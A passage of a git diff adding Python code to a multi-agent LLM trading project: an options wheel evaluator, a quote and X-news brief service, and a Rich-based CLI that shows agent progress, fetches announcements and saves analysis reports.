refresh_dashboard_snapshot(limit: int = 10) -> dict[str, Any]: + snapshot, news = md.refresh_dashboard_cache(limit=limit) + return _serialize_snapshot(snapshot, news) + + +def wheel_profiles() -> list[dict[str, Any]]: + out: list[dict[str, Any]] = [] + for key, p in STYLE_PROFILES.items(): + out.append( + { + "key": key, + "label": p.label, + "dte": p.dte, + "ivr_min": p.ivr_min, + "rsi_max": p.rsi_max, + "put_otm": p.put_otm, + "call_otm": p.call_otm, + "put_tp": p.put_tp, + "call_tp": p.call_tp, + "put_sl": p.put_sl, + } + ) + return out + + +def _fetch_close(ticker: str) -> Any: + df = yf.download(ticker, period="6mo", auto_adjust=True, progress=False) + if df.empty: + raise RuntimeError(f"{ticker} 无可用行情") + close = df["Close"] + if hasattr(close, "columns"): + close = close.iloc[:, 0] + return close.dropna() + + +def _estimate_ivr(underlying_close: Any) -> float: + ret = underlying_close.pct_change().dropna() + if len(ret) < 20: + return 50.0 + hv = ret.rolling(20).std() * np.sqrt(252) + iv = (hv * 1.15).clip(lower=0.1, upper=2.5) + iv_min = iv.rolling(126, min_periods=20).min() + iv_max = iv.rolling(126, min_periods=20).max() + ivr = ((iv - iv_min) / (iv_max - iv_min).replace(0, np.nan) * 100.0).fillna(50.0) + return float(ivr.iloc[-1]) + + +def wheel_evaluate(style_key: str, underlying_ticker: str, signal_ticker: str) -> dict[str, Any]: + if style_key not in STYLE_PROFILES: + raise RuntimeError(f"未知风格:{style_key}") + style = STYLE_PROFILES[style_key] + ul = _fetch_close(underlying_ticker.upper()) + sig = _fetch_close(signal_ticker.upper()) + rs = rsi(sig, 14).fillna(50.0) + latest_ul = float(ul.iloc[-1]) + latest_sig = float(sig.iloc[-1]) + latest_rsi = float(rs.iloc[-1]) + latest_ivr = _estimate_ivr(ul) + + put_strike = round(latest_ul * (1.0 - style.put_otm), 2) + call_strike = round(latest_ul * (1.0 + style.call_otm), 2) + put_entry_ok = latest_ivr >= style.ivr_min and latest_rsi <= style.rsi_max + regime = "bullish" if latest_sig >= float(sig.iloc[-20:].mean()) else "neutral_to_weak" + if put_entry_ok: + action = f"可考虑卖出现金担保Put(行权价约 {put_strike})" + elif regime == "bullish": + action = "等待更优波动率窗口(IVR 偏低),暂不卖Put" + else: + action = "信号偏弱,优先观望或缩小仓位" + + return { + "style": { + "key": style.key, + "label": style.label, + "dte": style.dte, + "ivr_min": style.ivr_min, + "rsi_max": style.rsi_max, + "put_otm": style.put_otm, + "call_otm": style.call_otm, + "put_tp": style.put_tp, + "call_tp": style.call_tp, + "put_sl": style.put_sl, + }, + "signal": { + "underlying_ticker": underlying_ticker.upper(), + "signal_ticker": signal_ticker.upper(), + "underlying_price": latest_ul, + "signal_price": latest_sig, + "rsi14": latest_rsi, + "ivr_est": latest_ivr, + "put_entry_ok": put_entry_ok, + "regime": regime, + }, + "execution_hint": { + "suggested_action": action, + "put_strike_hint": put_strike, + "call_strike_hint": call_strike, + "dte_hint": style.dte, + "take_profit": { + "put": style.put_tp, + "call": style.call_tp, + }, + }, + } + + +def _normalize_quote_code(code: str) -> str: + c = (code or "").strip().upper() + if not c: + return "" + if c.startswith("US.."): + return f"^{c[4:]}" + if c.startswith("US."): + return c[3:] + return c + + +def batch_quotes(codes: list[str]) -> list[dict[str, Any]]: + out: list[dict[str, Any]] = [] + for raw in codes: + normalized = _normalize_quote_code(raw) + if not normalized: + continue + q = md._quote(normalized, normalized) + out.append( + { + "request_code": raw, + "normalized_code": normalized, + "ticker": q.ticker, + "label": q.label, + "price": q.price, + "prev_close": q.prev_close, + "change": q.change, + "change_pct": q.change_pct, + } + ) + return out + + +def get_x_brief_latest() -> dict[str, Any] | None: + return load_latest_view() + + +def refresh_x_brief(days: int = 7, per_account_limit: int = 80) -> dict[str, Any]: + payload = collect_x_rss_last_week(days=days, per_account_limit=per_account_limit) + cfg = build_llm_config(None) + # X Brief 两层模型: + # - 第一层编排:thinking(MiniMax) + # - 第二层翻译:quick(沿用 quick_think_llm) + cfg["xbrief_orchestrator_provider"] = os.environ.get("XBRIEF_ORCHESTRATOR_PROVIDER", "siliconflow") + cfg["xbrief_orchestrator_model"] = os.environ.get("XBRIEF_ORCHESTRATOR_MODEL", "Pro/MiniMaxAI/MiniMax-M2.5") + cfg["xbrief_orchestrator_base_url"] = os.environ.get("XBRIEF_ORCHESTRATOR_BASE_URL", "https://api.siliconflow.cn/v1") + cfg["xbrief_translate_provider"] = cfg.get("llm_provider") + cfg["xbrief_translate_model"] = cfg.get("quick_think_llm") + cfg["xbrief_translate_base_url"] = cfg.get("backend_url") + save_raw_payload(payload) + tweet_md = build_tweet_summary_markdown(payload) + modules: dict[str, Any] + try: + modules = build_x_brief_modules(payload, tweet_md, cfg) + except Exception as exc: + modules = build_fallback_modules(payload) + modules["risk_signals"] = modules.get("risk_signals", []) + [ + { + "id": "llm-fallback-error", + "level": "MID", + "title": "LLM 编排暂不可用", + "detail": f"本次使用规则兜底:{exc}", + } + ] + if not any(modules.get(k) for k in ("themes", "p0_events", "top_quotes", "category_updates", "risk_signals")): + modules = build_fallback_modules(payload) + + # 最终落盘前统一做一遍 URL 规范化,避免历史链路残留 nitter 链接。 + tweets = payload.get("tweets", []) or [] + norm_tweets: list[dict[str, Any]] = [] + for t in tweets: + d = dict(t) + d["url"] = normalize_to_x_url(str(d.get("url", "")), str(d.get("handle", ""))) + norm_tweets.append(d) + payload["tweets"] = norm_tweets + + for theme in modules.get("themes", []) or []: + for sample in theme.get("samples", []) or []: + sample["url"] = normalize_to_x_url(str(sample.get("url", "")), str(sample.get("handle", ""))) + for e in modules.get("p0_events", []) or []: + e["url"] = normalize_to_x_url(str(e.get("url", ""))) + for q in modules.get("top_quotes", []) or []: + speaker = str(q.get("speaker", "")).lstrip("@") + q["url"] = normalize_to_x_url(str(q.get("url", "")), speaker) + for c in modules.get("category_updates", []) or []: + for item in c.get("items", []) or []: + item["url"] = normalize_to_x_url(str(item.get("url", ""))) + + try: + payload = translate_display_content(payload, modules, cfg) + except Exception as exc: + modules["risk_signals"] = (modules.get("risk_signals") or []) + [ + { + "id": "llm-translate-fallback-error", + "level": "MID", + "title": "前端内容翻译层异常", + "detail": f"本次展示内容使用原文兜底:{exc}", + } + ] + analysis_md = build_monthly_analysis_markdown(payload) + + # 统计 modules 实际引用的唯一推文数,写入 overview + _kept_urls: set[str] = set() + for _theme in modules.get("themes", []) or []: + for _s in _theme.get("samples", []) or []: + if _s.get("url"): + _kept_urls.add(_s["url"]) + for _e in modules.get("p0_events", []) or []: + if _e.get("url"): + _kept_urls.add(_e["url"]) + for _q in modules.get("top_quotes", []) or []: + if _q.get("url"): + _kept_urls.add(_q["url"]) + overview = dict(payload.get("overview") or {}) + overview["tweets_kept"] = len(_kept_urls) + payload = dict(payload) + payload["overview"] = overview + + return persist_outputs(payload, tweet_md, analysis_md, modules=modules) + diff --git a/cli/__init__.py b/cli/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/cli/announcements.py b/cli/announcements.py new file mode 100644 index 0000000..5947cee --- /dev/null +++ b/cli/announcements.py @@ -0,0 +1,51 @@ +import getpass +import requests +from rich.console import Console +from rich.panel import Panel + +from cli.config import CLI_CONFIG + + +def fetch_announcements(url: str = None, timeout: float = None) -> dict: + """Fetch announcements from endpoint. Returns dict with announcements and settings.""" + endpoint = url or CLI_CONFIG["announcements_url"] + timeout = timeout or CLI_CONFIG["announcements_timeout"] + fallback = CLI_CONFIG["announcements_fallback"] + + try: + response = requests.get(endpoint, timeout=timeout) + response.raise_for_status() + data = response.json() + return { + "announcements": data.get("announcements", [fallback]), + "require_attention": data.get("require_attention", False), + } + except Exception: + return { + "announcements": [fallback], + "require_attention": False, + } + + +def display_announcements(console: Console, data: dict) -> None: + """Display announcements panel. Prompts for Enter if require_attention is True.""" + announcements = data.get("announcements", []) + require_attention = data.get("require_attention", False) + + if not announcements: + return + + content = "\n".join(announcements) + + panel = Panel( + content, + border_style="cyan", + padding=(1, 2), + title="Announcements", + ) + console.print(panel) + + if require_attention: + getpass.getpass("Press Enter to continue...") + else: + console.print() diff --git a/cli/config.py b/cli/config.py new file mode 100644 index 0000000..08483f4 --- /dev/null +++ b/cli/config.py @@ -0,0 +1,6 @@ +CLI_CONFIG = { + # Announcements + "announcements_url": "https://api.tauric.ai/v1/announcements", + "announcements_timeout": 1.0, + "announcements_fallback": "[cyan]For more information, please visit[/cyan] [link=https://github.com/TauricResearch]https://github.com/TauricResearch[/link]", +} diff --git a/cli/main.py b/cli/main.py new file mode 100644 index 0000000..2fcbdd1 --- /dev/null +++ b/cli/main.py @@ -0,0 +1,1208 @@ +from typing import Optional +import datetime +import typer +from pathlib import Path +from functools import wraps +from rich.console import Console +from dotenv import load_dotenv + +# Load environment variables from .env file +load_dotenv() +from rich.panel import Panel +from rich.spinner import Spinner +from rich.live import Live +from rich.columns import Columns +from rich.markdown import Markdown +from rich.layout import Layout +from rich.text import Text +from rich.table import Table +from collections import deque +import time +from rich.tree import Tree +from rich import box +from rich.align import Align +from rich.rule import Rule + +from tradingagents.graph.trading_graph import TradingAgentsGraph +from tradingagents.default_config import DEFAULT_CONFIG +from cli.models import AnalystType +from cli.utils import * +from cli.announcements import fetch_announcements, display_announcements +from cli.stats_handler import StatsCallbackHandler + +console = Console() + +app = typer.Typer( + name="TradingAgents", + help="TradingAgents CLI: Multi-Agents LLM Financial Trading Framework", + add_completion=True, # Enable shell completion +) + + +# Create a deque to store recent messages with a maximum length +class MessageBuffer: + # Fixed teams that always run (not user-selectable) + FIXED_AGENTS = { + "Research Team": ["Bull Researcher", "Bear Researcher", "Research Manager"], + "Trading Team": ["Trader"], + "Risk Management": ["Aggressive Analyst", "Neutral Analyst", "Conservative Analyst"], + "Portfolio Management": ["Portfolio Manager"], + } + + # Analyst name mapping + ANALYST_MAPPING = { + "market": "Market Analyst", + "social": "Social Analyst", + "news": "News Analyst", + "fundamentals": "Fundamentals Analyst", + } + + # Report section mapping: section -> (analyst_key for filtering, finalizing_agent) + # analyst_key: which analyst selection controls this section (None = always included) + # finalizing_agent: which agent must be "completed" for this report to count as done + REPORT_SECTIONS = { + "market_report": ("market", "Market Analyst"), + "sentiment_report": ("social", "Social Analyst"), + "news_report": ("news", "News Analyst"), + "fundamentals_report": ("fundamentals", "Fundamentals Analyst"), + "investment_plan": (None, "Research Manager"), + "trader_investment_plan": (None, "Trader"), + "final_trade_decision": (None, "Portfolio Manager"), + } + + def __init__(self, max_length=100): + self.messages = deque(maxlen=max_length) + self.tool_calls = deque(maxlen=max_length) + self.current_report = None + self.final_report = None # Store the complete final report + self.agent_status = {} + self.current_agent = None + self.report_sections = {} + self.selected_analysts = [] + self._last_message_id = None + + def init_for_analysis(self, selected_analysts): + """Initialize agent status and report sections based on selected analysts. + + Args: + selected_analysts: List of analyst type strings (e.g., ["market", "news"]) + """ + self.selected_analysts = [a.lower() for a in selected_analysts] + + # Build agent_status dynamically + self.agent_status = {} + + # Add selected analysts + for analyst_key in self.selected_analysts: + if analyst_key in self.ANALYST_MAPPING: + self.agent_status[self.ANALYST_MAPPING[analyst_key]] = "pending" + + # Add fixed teams + for team_agents in self.FIXED_AGENTS.values(): + for agent in team_agents: + self.agent_status[agent] = "pending" + + # Build report_sections dynamically + self.report_sections = {} + for section, (analyst_key, _) in self.REPORT_SECTIONS.items(): + if analyst_key is None or analyst_key in self.selected_analysts: + self.report_sections[section] = None + + # Reset other state + self.current_report = None + self.final_report = None + self.current_agent = None + self.messages.clear() + self.tool_calls.clear() + self._last_message_id = None + + def get_completed_reports_count(self): + """Count reports that are finalized (their finalizing agent is completed). + + A report is considered complete when: + 1. The report section has content (not None), AND + 2. The agent responsible for finalizing that report has status "completed" + + This prevents interim updates (like debate rounds) from counting as completed. + """ + count = 0 + for section in self.report_sections: + if section not in self.REPORT_SECTIONS: + continue + _, finalizing_agent = self.REPORT_SECTIONS[section] + # Report is complete if it has content AND its finalizing agent is done + has_content = self.report_sections.get(section) is not None + agent_done = self.agent_status.get(finalizing_agent) == "completed" + if has_content and agent_done: + count += 1 + return count + + def add_message(self, message_type, content): + timestamp = datetime.datetime.now().strftime("%H:%M:%S") + self.messages.append((timestamp, message_type, content)) + + def add_tool_call(self, tool_name, args): + timestamp = datetime.datetime.now().strftime("%H:%M:%S") + self.tool_calls.append((timestamp, tool_name, args)) + + def update_agent_status(self, agent, status): + if agent in self.agent_status: + self.agent_status[agent] = status + self.current_agent = agent + + def update_report_section(self, section_name, content): + if section_name in self.report_sections: + self.report_sections[section_name] = content + self._update_current_report() + + def _update_current_report(self): + # For the panel display, only show the most recently updated section + latest_section = None + latest_content = None + + # Find the most recently updated section + for section, content in self.report_sections.items(): + if content is not None: + latest_section = section + latest_content = content + + if latest_section and latest_content: + # Format the current section for display + section_titles = { + "market_report": "Market Analysis", + "sentiment_report": "Social Sentiment", + "news_report": "News Analysis", + "fundamentals_report": "Fundamentals Analysis", + "investment_plan": "Research Team Decision", + "trader_investment_plan": "Trading Team Plan", + "final_trade_decision": "Portfolio Management Decision", + } + self.current_report = ( + f"### {section_titles[latest_section]}\n{latest_content}" + ) + + # Update the final complete report + self._update_final_report() + + def _update_final_report(self): + report_parts = [] + + # Analyst Team Reports - use .get() to handle missing sections + analyst_sections = ["market_report", "sentiment_report", "news_report", "fundamentals_report"] + if any(self.report_sections.get(section) for section in analyst_sections): + report_parts.append("## Analyst Team Reports") + if self.report_sections.get("market_report"): + report_parts.append( + f"### Market Analysis\n{self.report_sections['market_report']}" + ) + if self.report_sections.get("sentiment_report"): + report_parts.append( + f"### Social Sentiment\n{self.report_sections['sentiment_report']}" + ) + if self.report_sections.get("news_report"): + report_parts.append( + f"### News Analysis\n{self.report_sections['news_report']}" + ) + if self.report_sections.get("fundamentals_report"): + report_parts.append( + f"### Fundamentals Analysis\n{self.report_sections['fundamentals_report']}" + ) + + # Research Team Reports + if self.report_sections.get("investment_plan"): + report_parts.append("## Research Team Decision") + report_parts.append(f"{self.report_sections['investment_plan']}") + + # Trading Team Reports + if self.report_sections.get("trader_investment_plan"): + report_parts.append("## Trading Team Plan") + report_parts.append(f"{self.report_sections['trader_investment_plan']}") + + # Portfolio Management Decision + if self.report_sections.get("final_trade_decision"): + report_parts.append("## Portfolio Management Decision") + report_parts.append(f"{self.report_sections['final_trade_decision']}") + + self.final_report = "\n\n".join(report_parts) if report_parts else None + + +message_buffer = MessageBuffer() + + +def create_layout(): + layout = Layout() + layout.split_column( + Layout(name="header", size=3), + Layout(name="main"), + Layout(name="footer", size=3), + ) + layout["main"].split_column( + Layout(name="upper", ratio=3), Layout(name="analysis", ratio=5) + ) + layout["upper"].split_row( + Layout(name="progress", ratio=2), Layout(name="messages", ratio=3) + ) + return layout + + +def format_tokens(n): + """Format token count for display.""" + if n >= 1000: + return f"{n/1000:.1f}k" + return str(n) + + +def update_display(layout, spinner_text=None, stats_handler=None, start_time=None): + # Header with welcome message + layout["header"].update( + Panel( + "[bold green]Welcome to TradingAgents CLI[/bold green]\n" + "[dim]© [Tauric Research](https://github.com/TauricResearch)[/dim]", + title="Welcome to TradingAgents", + border_style="green", + padding=(1, 2), + expand=True, + ) + ) + + # Progress panel showing agent status + progress_table = Table( + show_header=True, + header_style="bold magenta", + show_footer=False, + box=box.SIMPLE_HEAD, # Use simple header with horizontal lines + title=None, # Remove the redundant Progress title + padding=(0, 2), # Add horizontal padding + expand=True, # Make table expand to fill available space + ) + progress_table.add_column("Team", style="cyan", justify="center", width=20) + progress_table.add_column("Agent", style="green", justify="center", width=20) + progress_table.add_column("Status", style="yellow", justify="center", width=20) + + # Group agents by team - filter to only include agents in agent_status + all_teams = { + "Analyst Team": [ + "Market Analyst", + "Social Analyst", + "News Analyst", + "Fundamentals Analyst", + ], + "Research Team": ["Bull Researcher", "Bear Researcher", "Research Manager"], + "Trading Team": ["Trader"], + "Risk Management": ["Aggressive Analyst", "Neutral Analyst", "Conservative Analyst"], + "Portfolio Management": ["Portfolio Manager"], + } + + # Filter teams to only include agents that are in agent_status + teams = {} + for team, agents in all_teams.items(): + active_agents = [a for a in agents if a in message_buffer.agent_status] + if active_agents: + teams[team] = active_agents + + for team, agents in teams.items(): + # Add first agent with team name + first_agent = agents[0] + status = message_buffer.agent_status.get(first_agent, "pending") + if status == "in_progress": + spinner = Spinner( + "dots", text="[blue]in_progress[/blue]", style="bold cyan" + ) + status_cell = spinner + else: + status_color = { + "pending": "yellow", + "completed": "green", + "error": "red", + }.get(status, "white") + status_cell = f"[{status_color}]{status}[/{status_color}]" + progress_table.add_row(team, first_agent, status_cell) + + # Add remaining agents in team + for agent in agents[1:]: + status = message_buffer.agent_status.get(agent, "pending") + if status == "in_progress": + spinner = Spinner( + "dots", text="[blue]in_progress[/blue]", style="bold cyan" + ) + status_cell = spinner + else: + status_color = { + "pending": "yellow", + "completed": "green", + "error": "red", + }.get(status, "white") + status_cell = f"[{status_color}]{status}[/{status_color}]" + progress_table.add_row("", agent, status_cell) + + # Add horizontal line after each team + progress_table.add_row("─" * 20, "─" * 20, "─" * 20, style="dim") + + layout["progress"].update( + Panel(progress_table, title="Progress", border_style="cyan", padding=(1, 2)) + ) + + # Messages panel showing recent messages and tool calls + messages_table = Table( + show_header=True, + header_style="bold magenta", + show_footer=False, + expand=True, # Make table expand to fill available space + box=box.MINIMAL, # Use minimal box style for a lighter look + show_lines=True, # Keep horizontal lines + padding=(0, 1), # Add some padding between columns + ) + messages_table.add_column("Time", style="cyan", width=8, justify="center") + messages_table.add_column("Type", style="green", width=10, justify="center") + messages_table.add_column( + "Content", style="white", no_wrap=False, ratio=1 + ) # Make content column expand + + # Combine tool calls and messages + all_messages = [] + + # Add tool calls + for timestamp, tool_name, args in message_buffer.tool_calls: + formatted_args = format_tool_args(args) + all_messages.append((timestamp, "Tool", f"{tool_name}: {formatted_args}")) + + # Add regular messages + for timestamp, msg_type, content in message_buffer.messages: + content_str = str(content) if content else "" + if len(content_str) > 200: + content_str = content_str[:197] + "..." + all_messages.append((timestamp, msg_type, content_str)) + + # Sort by timestamp descending (newest first) + all_messages.sort(key=lambda x: x[0], reverse=True) + + # Calculate how many messages we can show based on available space + max_messages = 12 + + # Get the first N messages (newest ones) + recent_messages = all_messages[:max_messages] + + # Add messages to table (already in newest-first order) + for timestamp, msg_type, content in recent_messages: + # Format content with word wrapping + wrapped_content = Text(content, overflow="fold") + messages_table.add_row(timestamp, msg_type, wrapped_content) + + layout["messages"].update( + Panel( + messages_table, + title="Messages & Tools", + border_style="blue", + padding=(1, 2), + ) + ) + + # Analysis panel showing current report + if message_buffer.current_report: + layout["analysis"].update( + Panel( + Markdown(message_buffer.current_report), + title="Current Report", + border_style="green", + padding=(1, 2), + ) + ) + else: + layout["analysis"].update( + Panel( + "[italic]Waiting for analysis report...[/italic]", + title="Current Report", + border_style="green", + padding=(1, 2), + ) + ) + + # Footer with statistics + # Agent progress - derived from agent_status dict + agents_completed = sum( + 1 for status in message_buffer.agent_status.values() if status == "completed" + ) + agents_total = len(message_buffer.agent_status) + + # Report progress - based on agent completion (not just content existence) + reports_completed = message_buffer.get_completed_reports_count() + reports_total = len(message_buffer.report_sections) + + # Build stats parts + stats_parts = [f"Agents: {agents_completed}/{agents_total}"] + + # LLM and tool stats from callback handler + if stats_handler: + stats = stats_handler.get_stats() + stats_parts.append(f"LLM: {stats['llm_calls']}") + stats_parts.append(f"Tools: {stats['tool_calls']}") + + # Token display with graceful fallback + if stats["tokens_in"] > 0 or stats["tokens_out"] > 0: + tokens_str = f"Tokens: {format_tokens(stats['tokens_in'])}\u2191 {format_tokens(stats['tokens_out'])}\u2193" + else: + tokens_str = "Tokens: --" + stats_parts.append(tokens_str) + + stats_parts.append(f"Reports: {reports_completed}/{reports_total}") + + # Elapsed time + if start_time: + elapsed = time.time() - start_time + elapsed_str = f"\u23f1 {int(elapsed // 60):02d}:{int(elapsed % 60):02d}" + stats_parts.append(elapsed_str) + + stats_table = Table(show_header=False, box=None, padding=(0, 2), expand=True) + stats_table.add_column("Stats", justify="center") + stats_table.add_row(" | ".join(stats_parts)) + + layout["footer"].update(Panel(stats_table, border_style="grey50")) + + +def get_user_selections(): + """Get all user selections before starting the analysis display.""" + # Display ASCII art welcome message + with open(Path(__file__).parent / "static" / "welcome.txt", "r") as f: + welcome_ascii = f.read() + + # Create welcome box content + welcome_content = f"{welcome_ascii}\n" + welcome_content += "[bold green]TradingAgents: Multi-Agents LLM Financial Trading Framework - CLI[/bold green]\n\n" + welcome_content += "[bold]Workflow Steps:[/bold]\n" + welcome_content += "I. Analyst Team → II. Research Team → III. Trader → IV. Risk Management → V. Portfolio Management\n\n" + welcome_content += ( + "[dim]Built by [Tauric Research](https://github.com/TauricResearch)[/dim]" + ) + + # Create and center the welcome box + welcome_box = Panel( + welcome_content, + border_style="green", + padding=(1, 2), + title="Welcome to TradingAgents", + subtitle="Multi-Agents LLM Financial Trading Framework", + ) + console.print(Align.center(welcome_box)) + console.print() + console.print() # Add vertical space before announcements + + # Fetch and display announcements (silent on failure) + announcements = fetch_announcements() + display_announcements(console, announcements) + + # Create a boxed questionnaire for each step + def create_question_box(title, prompt, default=None): + box_content = f"[bold]{title}[/bold]\n" + box_content += f"[dim]{prompt}[/dim]" + if default: + box_content += f"\n[dim]Default: {default}[/dim]" + return Panel(box_content, border_style="blue", padding=(1, 2)) + + # Step 1: Ticker symbol + console.print( + create_question_box( + "Step 1: Ticker Symbol", + "Enter the exact ticker symbol to analyze, including exchange suffix when needed (examples: SPY, CNC.TO, 7203.T, 0700.HK)", + "SPY", + ) + ) + selected_ticker = get_ticker() + + # Step 2: Analysis date + default_date = datetime.datetime.now().strftime("%Y-%m-%d") + console.print( + create_question_box( + "Step 2: Analysis Date", + "Enter the analysis date (YYYY-MM-DD)", + default_date, + ) + ) + analysis_date = get_analysis_date() + + # Step 3: Output language + console.print( + create_question_box( + "Step 3: Output Language", + "Select the language for analyst reports and final decision" + ) + ) + output_language = ask_output_language() + + # Step 4: Select analysts + console.print( + create_question_box( + "Step 4: Analysts Team", "Select your LLM analyst agents for the analysis" + ) + ) + selected_analysts = select_analysts() + console.print( + f"[green]Selected analysts:[/green] {', '.join(analyst.value for analyst in selected_analysts)}" + ) + + # Step 5: Research depth + console.print( + create_question_box( + "Step 5: Research Depth", "Select your research depth level" + ) + ) + selected_research_depth = select_research_depth() + + # Step 6: LLM Provider + console.print( + create_question_box( + "Step 6: LLM Provider", "Select your LLM provider" + ) + ) + selected_llm_provider, backend_url = select_llm_provider() + + # Step 7: Thinking agents + console.print( + create_question_box( + "Step 7: Thinking Agents", "Select your thinking agents for analysis" + ) + ) + selected_shallow_thinker = select_shallow_thinking_agent(selected_llm_provider) + selected_deep_thinker = select_deep_thinking_agent(selected_llm_provider) + + # Step 8: Provider-specific thinking configuration + thinking_level = None + reasoning_effort = None + anthropic_effort = None + + provider_lower = selected_llm_provider.lower() + if provider_lower == "google": + console.print( + create_question_box( + "Step 8: Thinking Mode", + "Configure Gemini thinking mode" + ) + ) + thinking_level = ask_gemini_thinking_config() + elif provider_lower in ("openai", "siliconflow"): + console.print( + create_question_box( + "Step 8: Reasoning Effort", + "Configure OpenAI-compatible reasoning effort level" + ) + ) + reasoning_effort = ask_openai_reasoning_effort() + elif provider_lower == "anthropic": + console.print( + create_question_box( + "Step 8: Effort Level", + "Configure Claude effort level" + ) + ) + anthropic_effort = ask_anthropic_effort() + + return { + "ticker": selected_ticker, + "analysis_date": analysis_date, + "analysts": selected_analysts, + "research_depth": selected_research_depth, + "llm_provider": selected_llm_provider.lower(), + "backend_url": backend_url, + "shallow_thinker": selected_shallow_thinker, + "deep_thinker": selected_deep_thinker, + "google_thinking_level": thinking_level, + "openai_reasoning_effort": reasoning_effort, + "anthropic_effort": anthropic_effort, + "output_language": output_language, + } + + +def get_ticker(): + """Get ticker symbol from user input.""" + return typer.prompt("", default="SPY") + + +def get_analysis_date(): + """Get the analysis date from user input.""" + while True: + date_str = typer.prompt( + "", default=datetime.datetime.now().strftime("%Y-%m-%d") + ) + try: + # Validate date format and ensure it's not in the future + analysis_date = datetime.datetime.strptime(date_str, "%Y-%m-%d") + if analysis_date.date() > datetime.datetime.now().date(): + console.print("[red]Error: Analysis date cannot be in the future[/red]") + continue + return date_str + except ValueError: + console.print( + "[red]Error: Invalid date format. Please use YYYY-MM-DD[/red]" + ) + + +def save_report_to_disk(final_state, ticker: str, save_path: Path): + """Save complete analysis report to disk with organized subfolders.""" + save_path.mkdir(parents=True, exist_ok=True) + sections = [] + + # 1. Analysts + analysts_dir = save_path / "1_analysts" + analyst_parts = [] + if final_state.get("market_report"): + analysts_dir.mkdir(exist_ok=True) + (analysts_dir / "market.md").write_text(final_state["market_report"]) + analyst_parts.append(("Market Analyst", final_state["market_report"])) + if final_state.get("sentiment_report"): + analysts_dir.mkdir(exist_ok=True) + (analysts_dir / "sentiment.md").write_text(final_state["sentiment_report"]) + analyst_parts.append(("Social Analyst", final_state["sentiment_report"])) + if final_state.get("news_report"): + analysts_dir.mkdir(exist_ok=True) + (analysts_dir / "news.md").write_text(final_state["news_report"]) + analyst_parts.append(("News Analyst", final_state["news_report"])) + if final_state.get("fundamentals_report"): + analysts_dir.mkdir(exist_ok=True) + (analysts_dir / "fundamentals.md").write_text(final_state["fundamentals_report"]) + analyst_parts.append(("Fundamentals Analyst", final_state["fundamentals_report"])) + if analyst_parts: + content = "\n\n".join(f"### {name}\n{text}" for name, text in analyst_parts) + sections.append(f"## I. Analyst Team Reports\n\n{content}") + + # 2. Research + if final_state.get("investment_debate_state"): + research_dir = save_path / "2_research" + debate = final_state["investment_debate_state"] + research_parts = [] + if debate.get("bull_history"): + research_dir.mkdir(exist_ok=True) + (research_dir / "bull.md").write_text(debate["bull_history"]) + research_parts.append(("Bull Researcher", debate["bull_history"])) + if debate.get("bear_history"): + research_dir.mkdir(exist_ok=True) + (research_dir / "bear.md").write_text(debate["bear_history"]) + research_parts.append(("Bear Researcher", debate["bear_history"])) + if debate.get("judge_decision"): + research_dir.mkdir(exist_ok=True) + (research_dir / "manager.md").write_text(debate["judge_decision"]) + research_parts.append(("Research Manager", debate["judge_decision"])) + if research_parts: + content = "\n\n".join(f"### {name}\n{text}" for name, text in research_parts) + sections.append(f"## II. Research Team Decision\n\n{content}") + + # 3. Trading + if final_state.get("trader_investment_plan"): + trading_dir = save_path / "3_trading" + trading_dir.mkdir(exist_ok=True) + (trading_dir / "trader.md").write_text(final_state["trader_investment_plan"]) + sections.append(f"## III. Trading Team Plan\n\n### Trader\n{final_state['trader_investment_plan']}") + + # 4. Risk Management + if final_state.get("risk_debate_state"): + risk_dir = save_path / "4_risk" + risk = final_state["risk_debate_state"] + risk_parts = [] + if risk.get("aggressive_history"): + risk_dir.mkdir(exist_ok=True) + (risk_dir / "aggressive.md").write_text(risk["aggressive_history"]) + risk_parts.append(("Aggressive Analyst", risk["aggressive_history"])) + if risk.get("conservative_history"): + risk_dir.mkdir(exist_ok=True) + (risk_dir / "conservative.md").write_text(risk["conservative_history"]) + risk_parts.append(("Conservative Analyst", risk["conservative_history"])) + if risk.get("neutral_history"): + risk_dir.mkdir(exist_ok=True) + (risk_dir / "neutral.md").write_text(risk["neutral_history"]) + risk_parts.append(("Neutral Analyst", risk["neutral_history"])) + if risk_parts: + content = "\n\n".join(f"### {name}\n{text}" for name, text in risk_parts) + sections.append(f"## IV. Risk Management Team Decision\n\n{content}") + + # 5. Portfolio Manager + if risk.get("judge_decision"): + portfolio_dir = save_path / "5_portfolio" + portfolio_dir.mkdir(exist_ok=True) + (portfolio_dir / "decision.md").write_text(risk["judge_decision"]) + sections.append(f"## V. Portfolio Manager Decision\n\n### Portfolio Manager\n{risk['judge_decision']}") + + # Write consolidated report + header = f"# Trading Analysis Report: {ticker}\n\nGenerated: {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n\n" + (save_path / "complete_report.md").write_text(header + "\n\n".join(sections)) + return save_path / "complete_report.md" + + +def display_complete_report(final_state): + """Display the complete analysis report sequentially (avoids truncation).""" + console.print() + console.print(Rule("Complete Analysis Report", style="bold green")) + + # I. Analyst Team Reports + analysts = [] + if final_state.get("market_report"): + analysts.append(("Market Analyst", final_state["market_report"])) + if final_state.get("sentiment_report"): + analysts.append(("Social Analyst", final_state["sentiment_report"])) + if final_state.get("news_report"): + analysts.append(("News Analyst", final_state["news_report"])) + if final_state.get("fundamentals_report"): + analysts.append(("Fundamentals Analyst", final_state["fundamentals_report"])) + if analysts: + console.print(Panel("[bold]I. Analyst Team Reports[/bold]", border_style="cyan")) + for title, content in analysts: + console.print(Panel(Markdown(content), title=title, border_style="blue", padding=(1, 2))) + + # II. Research Team Reports + if final_state.get("investment_debate_state"): + debate = final_state["investment_debate_state"] + research = [] + if debate.get("bull_history"): + research.append(("Bull Researcher", debate["bull_history"])) + if debate.get("bear_history"): + research.append(("Bear Researcher", debate["bear_history"])) + if debate.get("judge_decision"): + research.append(("Research Manager", debate["judge_decision"])) + if research: + console.print(Panel("[bold]II. Research Team Decision[/bold]", border_style="magenta")) + for title, content in research: + console.print(Panel(Markdown(content), title=title, border_style="blue", padding=(1, 2))) + + # III. Trading Team + if final_state.get("trader_investment_plan"): + console.print(Panel("[bold]III. Trading Team Plan[/bold]", border_style="yellow")) + console.print(Panel(Markdown(final_state["trader_investment_plan"]), title="Trader", border_style="blue", padding=(1, 2))) + + # IV. Risk Management Team + if final_state.get("risk_debate_state"): + risk = final_state["risk_debate_state"] + risk_reports = [] + if risk.get("aggressive_history"): + risk_reports.append(("Aggressive Analyst", risk["aggressive_history"])) + if risk.get("conservative_history"): + risk_reports.append(("Conservative Analyst", risk["conservative_history"])) + if risk.get("neutral_history"): + 